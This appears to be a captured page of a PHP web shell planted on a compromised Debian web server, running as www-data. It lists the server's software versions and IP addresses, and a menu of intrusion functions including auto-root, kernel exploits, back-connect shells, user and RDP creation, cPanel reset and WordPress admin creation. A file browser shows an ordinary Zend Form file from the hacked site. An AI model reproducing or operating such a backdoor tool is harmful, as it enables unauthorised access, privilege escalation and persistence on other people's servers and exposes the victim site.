Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.118.162.166
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
leksykografia /
application /
forms /
[ HOME SHELL ]
Name
Size
Permission
Action
Page.php
3.2
KB
-rw-r--r--
Partner.php
2.1
KB
-rw-r--r--
Vote.php
2.04
KB
-rw-r--r--
VoteAdmin.php
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : VoteAdmin.php
<?php class Application_Form_VoteAdmin extends Zend_Form { public function init() { $pageMapper = new Application_Model_PageMapper(); $pages = $pageMapper->fetchAllToVote(); // Set the method for the display form to POST $this->setMethod('post'); $this->setEnctype(Zend_Form::ENCTYPE_MULTIPART); // Add an email element $this->addElement('checkbox', 'active', array( 'label' => 'Aktywny:', 'required' => true, )); $pageSelect = new Zend_Form_Element_Select('page', array( 'label' => 'Film:', 'required' => true, 'validators' => array( array( 'NotEmpty', true, array( 'messages' => array( 'isEmpty' => 'Pole nie może by puste.' ))), ) )); foreach($pages as $page) $pageSelect->addMultiOption($page->getId(), $page->getTitle()); $this->addElement($pageSelect); // Add the submit button $this->addElement('submit', 'submit', array( 'ignore' => true, 'label' => 'Zatwierdź', )); } }
Close